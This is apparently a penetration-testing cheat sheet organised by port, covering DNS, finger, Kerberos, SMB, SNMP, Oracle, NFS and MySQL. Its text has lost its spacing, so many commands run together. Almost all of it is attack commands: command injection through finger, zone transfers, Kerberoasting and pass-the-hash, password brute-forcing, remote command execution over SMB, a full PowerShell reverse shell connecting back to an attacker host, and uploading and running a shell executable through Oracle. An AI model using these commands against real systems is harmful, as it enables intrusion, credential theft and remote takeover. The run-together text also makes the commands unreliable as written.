whois-h10.10.1.111-p43"domain.com"echo"domain.com"|nc-vn10.10.1.11143whois-h10.10.1.111-p43"a') or 1=1#"
Port 53 - DNS
# Transfer zonedigAXFRdomain.com@10.10.10.10# dig +multi AXFR @ns1.insecuredns.com insecuredns.comdnsrecon-taxfr-ddomainfierce-dnsdomain.com
Port 69 - UDP - TFTP
Known vulnerabilities exist in tftp server versions 1.3, 1.4, 1.9, 2.1, and a few others.
Apply the same checks as for FTP on port 21.
nmap-p69--script=tftp-enum.nse10.11.1.111
Port 79 - Finger
nc-vn10.11.1.11179echo"root"|nc-vn10.11.1.11179# User enumerationfinger@10.11.1.111#List usersfingeradmin@10.11.1.111#Get info of userfingeruser@10.11.1.111#Get info of userfinger"|/bin/id@example.com"finger"|/bin/ls -a /@example.com"
nmap-p88--script=krb5-enum-users--script-args="krb5-enum-users.realm='DOMAIN.LOCAL'"IPuseauxiliary/gather/kerberos_enumusers# MSF# Check for Kerberoasting: GetNPUsers.pyDOMAIN-Target/-usersfileuser.txt-dc-ip<IP>-formathashcat/john# GetUserSPNsASREPRoast:impacket-GetUserSPNs<domain_name>/<domain_user>:<domain_user_password>-request-format<AS_REP_responses_format [hashcat |john]>-outputfile<output_AS_REP_responses_file>impacket-GetUserSPNs<domain_name>/-usersfile<users_file>-format<AS_REP_responses_format [hashcat |john]>-outputfile<output_AS_REP_responses_file># Kerberoasting: impacket-GetUserSPNs<domain_name>/<domain_user>:<domain_user_password>-outputfile<output_TGSs_file># Overpass The Hash/Pass The Key (PTK):python3getTGT.py<domain_name>/<user_name>-hashes [lm_hash]:<ntlm_hash>python3getTGT.py<domain_name>/<user_name>-aesKey<aes_key>python3getTGT.py<domain_name>/<user_name>:[password]# Using TGT key to excute remote commands from the following impacket scripts:python3psexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpython3smbexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpython3wmiexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass# https://www.tarlogic.com/blog/como-funciona-kerberos/# https://www.tarlogic.com/blog/como-atacar-kerberos/pythonkerbrute.py-dc-ipIP-users/root/htb/kb_users.txt-passwords/root/pass_common_plus.txt-threads20-domainDOMAIN-outputfilekb_extracted_passwords.txt# https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/# https://github.com/GhostPack/Rubeus# https://github.com/fireeye/SSSDKCMExtractor# https://gitlab.com/Zer1t0/cerbero
Port 110 - Pop3
telnet10.11.1.111USERpelle@10.11.1.111PASSadmin# or:USERpellePASSadmin# List all emailslist# Retrieve email number 5, for exampleretr9
# Enum hostnameenum4linux-n10.11.1.111nmblookup-A10.11.1.111nmap--script=smb-enum*--script-args=unsafe=1-T510.11.1.111# Get Versionsmbver.sh10.11.1.111Msfconsole;usescanner/smb/smb_versionngrep-i-dtap0's.?a.?m.?b.?a.*[[:digit:]]'smbclient-L \\\\10.11.1.111# Get Sharessmbmap-H10.11.1.111-Rechoexit|smbclient-L \\\\10.11.1.111smbclient \\\\10.11.1.111\\smbclient -L//10.11.1.111-Nnmap--scriptsmb-enum-shares-p139,445-T4-Pn10.11.1.111smbclient-L \\\\10.11.1.111\\# If got error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED"smbclient-L//10.11.1.111/--option='client min protocol=NT1'# Check null sessionssmbmap-H10.11.1.111rpcclient-U""-N10.11.1.111smbclient//10.11.1.111/IPC$ -N# Exploit null sessionsenum-s10.11.1.111enum-U10.11.1.111enum-P10.11.1.111enum4linux-a10.11.1.111#https://github.com/cddmp/enum4linux-ng/enum4linux-ng.py10.11.1.111-A-C/usr/share/doc/python3-impacket/examples/samrdump.py10.11.1.111# Connect to username sharessmbclient//10.11.1.111/share-Uusername# Connect to share anonymouslysmbclient \\\\10.11.1.111\\smbclient //10.11.1.111/smbclient//10.11.1.111/smbclient//10.11.1.111/<""sharename"">rpcclient-U" "10.11.1.111rpcclient-U" "-N10.11.1.111# Check vulnsnmap--scriptsmb-vuln*-p139,445-T4-Pn10.11.1.111# Multi exploitsmsfconsole; useexploit/multi/samba/usermap_script; setlhost192.168.0.X; setrhost10.11.1.111; run# Bruteforce loginmedusa-h10.11.1.111-uuserhere-P/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt-Msmbntnmap-p445--scriptsmb-brute--script-argsuserdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt10.11.1.111-vvvvnmap–scriptsmb-brute10.11.1.111# nmap smb enum & vuln 
nmap--scriptsmb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols-p139,44510.11.1.111nmap--scriptsmb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse-p139,44510.11.1.111# Mount smb volume linuxmount-tcifs-ousername=user,password=password//x.x.x.x/share/mnt/share# rpcclient commandsrpcclient-U""10.11.1.111srvinfoenumdomusersgetdompwinfoquerydominfonetshareenumnetshareenumall# Run cmd over smb from linuxwinexe-Uusername//10.11.1.111"cmd.exe"--system# smbmapsmbmap.py-H10.11.1.111-uadministrator-pasdf1234#Enumsmbmap.py-uusername-p'P@$$w0rd1234!'-dDOMAINNAME-x'net group "Domain Admins" /domain'-H10.11.1.111#RCEsmbmap.py-H10.11.1.111-uusername-p'P@$$w0rd1234!'-L# Drive Listingsmbmap.py-uusername-p'P@$$w0rd1234!'-dABC-H10.11.1.111-x'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) 
;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'# Reverse Shell# Check\Policies\{REG}\MACHINE\Preferences\Groups\Groups.xmllookforuser&pass"gpp-decrypt "# CrackMapExeccrackmapexecsmb10.55.100.0/23-uLA-ITAdmin-H573f6308519b3df23d9ae2137f549b15--localcrackmapexecsmb10.55.100.0/23-uLA-ITAdmin-H573f6308519b3df23d9ae2137f549b15--local--lsa# Impacketpython3samdump.pySMB172.21.0.0# Check for systems with SMB Signing not enabledpython3RunFinger.py-i172.21.0.0/24
Port 161/162 UDP - SNMP
nmap-vv-sV-sU-Pn-p161,162--script=snmp-netstat,snmp-processes10.11.1.111nmap10.11.1.111-Pn-sU-p161--script=snmp-brute,snmp-hh3c-logins,snmp-info,snmp-interfaces,snmp-ios-config,snmp-netstat,snmp-processes,snmp-sysdescr,snmp-win32-services,snmp-win32-shares,snmp-win32-software,snmp-win32-userssnmp-check10.11.1.111-cpublic|private|communitysnmpwalk-cpublic-v1ipaddress1snmpwalk-cprivate-v1ipaddress1snmpwalk-cmanager-v1ipaddress1onesixtyone-c/usr/share/doc/onesixtyone/dict.txt172.21.0.X# Impacketpython3samdump.pySNMP172.21.0.0# MSF aux modulesauxiliary/scanner/misc/oki_scannerauxiliary/scanner/snmp/aix_versionauxiliary/scanner/snmp/arris_dg950auxiliary/scanner/snmp/brocade_enumhashauxiliary/scanner/snmp/cisco_config_tftpauxiliary/scanner/snmp/cisco_upload_fileauxiliary/scanner/snmp/cnpilot_r_snmp_lootauxiliary/scanner/snmp/epmp1000_snmp_lootauxiliary/scanner/snmp/netopia_enumauxiliary/scanner/snmp/sbg6580_enumauxiliary/scanner/snmp/snmp_enumauxiliary/scanner/snmp/snmp_enum_hp_laserjetauxiliary/scanner/snmp/snmp_enumsharesauxiliary/scanner/snmp/snmp_enumusersauxiliary/scanner/snmp/snmp_login
oscanner-s10.11.1.111-P1521tnscmd10gversion-h10.11.1.111tnscmd10gstatus-h10.11.1.111nmap-p1521-A10.11.1.111nmap-p1521--script=oracle-tns-version,oracle-sid-brute,oracle-bruteMSF:goodmodulesunderauxiliary/admin/oracleandscanner/oracle# https://github.com/quentinhardy/odat./odat-libc2.5-i686all-s10.11.1.111-p1521./odat-libc2.5-i686sidguesser-s10.11.1.111-p1521./odat-libc2.5-i686passwordguesser-s10.11.1.111-p1521-dXE# Upload reverse shell with ODAT:./odat-libc2.5-i686utlfile-s10.11.1.111-p1521-Uscott-Ptiger-dXE--sysdba--putFilec:/shell.exe/root/shell.exe# and run it:./odat-libc2.5-i686externaltable-s10.11.1.111-p1521-Uscott-Ptiger-dXE--sysdba--execc:/shell.exe
nmap-p111,2049--scriptnfs-ls,nfs-showmountshowmount-e10.11.1.111# If you find anything you can mount it like this:mount10.11.1.111://tmp/NFS–onolockmount-tnfs10.11.1.111://tmp/NFS–onolock
nmap--script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse10.11.1.111-p3306mysql--host=10.11.1.111-uroot-p# MYSQL UDF 4.x/5.0https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/